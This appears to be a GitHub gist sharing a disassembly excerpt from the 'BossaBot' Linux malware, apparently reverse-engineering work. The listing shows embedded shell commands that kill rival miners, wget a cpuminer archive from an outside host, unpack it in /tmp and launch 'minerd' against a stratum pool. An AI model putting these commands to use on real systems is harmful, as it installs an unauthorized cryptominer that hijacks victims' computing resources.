Skip to content

Instantly share code, notes, and snippets.

@revENGR
Created May 3, 2020 10:21
Show Gist options
  • Save revENGR/0e29cdbb6bfb9da7d55977afd1f74d1a to your computer and use it in GitHub Desktop.
Save revENGR/0e29cdbb6bfb9da7d55977afd1f74d1a to your computer and use it in GitHub Desktop.
BossaBot
.text:0804A1F5 mov edx, offset aTmpMinerdT4OSt ; "/tmp/minerd -t 4 -o stratum+tcp://%s:%s"...
.text:0804A1FA lea ebx, [ebp+var_108]
.text:0804A200 mov [esp+18h], eax
.text:0804A204 mov eax, [esi+0Ch]
.text:0804A207 mov [esp+14h], eax
.text:0804A20B mov eax, [esi+8]
.text:0804A20E mov [esp+10h], eax
.text:0804A212 mov eax, [esi+4]
.text:0804A215 mov [esp+8], edx
.text:0804A219 mov [esp], ebx
.text:0804A21C mov [esp+0Ch], eax
.text:0804A220 mov eax, 100h
.text:0804A225 mov [esp+4], eax
.text:0804A229 call _snprintf
.text:0804A22E mov dword ptr [esp], offset aPkillMinerdPki ; "pkill minerd ; pkill m32 ; pkill m64"
.text:0804A235 call _system
.text:0804A23A mov dword ptr [esp], offset aWgetQTenetDlSo ; "wget -q tenet.dl.sourceforge.net/projec"...
.text:0804A241 call _system
.text:0804A246 mov dword ptr [esp], offset aTarZxfTmpPoole ; "tar -zxf /tmp/pooler-cpuminer-2.4-linux"...
.text:0804A24D call _system
.text:0804A252 mov dword ptr [esp], offset aRmRTmpPool ; "rm -r /tmp/pool*"
.text:0804A259 call _system
.text:0804A25E mov [esp], ebx
.text:0804A261 call _system
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment